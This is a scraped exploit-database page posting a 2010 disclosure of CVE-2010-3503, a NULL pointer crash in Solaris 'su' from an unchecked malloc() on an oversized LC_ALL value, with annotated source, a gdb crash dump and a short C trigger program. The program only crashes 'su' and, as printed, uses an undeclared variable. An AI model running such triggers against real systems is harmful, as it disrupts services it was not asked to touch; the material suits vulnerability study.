Home / os / win7

[local exploits] - Oracle Solaris CVE-2010-3503 'su

Posted on 13 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Oracle Solaris CVE-2010-3503 &#039;su&#039; Local Solaris Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Oracle Solaris CVE-2010-3503 &#039;su&#039; Local Solaris Vulnerability by prdelka in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=============================================================
Oracle Solaris CVE-2010-3503 &#039;su&#039; Local Solaris Vulnerability
=============================================================

521         for (j = 0; initenv[j] != 0; j++) { [1]
    522             if (initvar = getenv(initenv[j])) { [2]
    ...
    535                 } else {
    536                     var = (char *)
    537                         malloc(strlen(initenv[j]) [3]
    538                         + strlen(initvar)
    539                         + 2);
    540                     (void) strcpy(var, initenv[j]); [4]
  
&#039;su&#039; when creating new environment from inherited environment inherits values defined
such as LC_ALL and TZ, the call at [1] walks over an array of values to inherit and
then at [2] when it finds one it does some checks if its not TZ= e.g. LC_ALL it passes
the variable into a controllable malloc() [3] WITH NO CHECKING ON RETURNED VALUE, this
means if malloc() fails it could return 0x0 and pass to strcpy() at [4] introducing
a null ptr vulnerability in &#039;su&#039;.
 
 
   Program terminated with signal 11, Segmentation fault.
   #0  0xd1244734 in ?? ()
   (gdb) x/i $pc
   0xd1244734:  mov    %eax,(%edi)
   (gdb) i r $eax
   eax            0x415f434c    1096762188 &lt;- OUR STRING
   (gdb) i r $edi
   edi            0x0   0 &lt;- NULL PTR
 
    Incurred fault #6, FLTBOUNDS  %pc = 0xD1244734
      siginfo: SIGSEGV SEGV_MAPERR addr=0x00000000
    Received signal #11, SIGSEGV [default]
      siginfo: SIGSEGV SEGV_MAPERR addr=0x00000000
 
 
----[ PoC trigger &#039;su&#039; as you.
/* Sun Solaris &lt;= 10 &#039;su&#039; NULL pointer exploit
   ===========================================
   because these are so 2009 now. I would exploit
   this but my name is not spender or raptor. Sun
   do not check a call to malloc() when handling
   environment variables in &#039;su&#039; code. They also
   don&#039;t check passwords when using telnet so who
   cares? You have to enter your local user pass
   to see this bug. Enjoy!
 
   admin@sundevil:~/suid$ ./x
   [ SunOS 5.11 &#039;su&#039; null ptr PoC
   Password:
   Segmentation Fault
 
  -- prdelka
*/
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/resource.h&gt;
#include &lt;sys/fcntl.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/mman.h&gt;
 
struct {
        rlim_t    rlim_cur;     /* current (soft) limit */
        rlim_t    rlim_max;     /* hard limit */
} rlimit;
 
int main(int argc,char *argv[]){
        int fd;
        struct rlimit* rlp = malloc(sizeof(rlimit));
        getrlimit(RLIMIT_DATA,rlp);
        char* buf1 = malloc(300000);
        memset(buf1,&#039;A&#039;,300000);
        long buf2 = (long)buf1 + 299999;
        memset((char*)buf2,0,1);
        memcpy(buf1,&quot;LC_ALL=&quot;,7);
        rlp-&gt;rlim_cur = 16400;
        setrlimit(RLIMIT_DATA,rlp);
        char* env[] = {buf1,file,NULL};
        char* args[] = {&quot;su&quot;,&quot;-&quot;,getlogin(),NULL};
        printf(&quot;[ SunOS 5.11 &#039;su&#039; null ptr PoC
&quot;);
        execve(&quot;/usr/bin/su&quot;,args,env);
}
 
 
// This was disclosed and patched in October 2010, CVE-2010-3503


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-13]</pre></body></html>

 

TOP

Malware :

Exploits :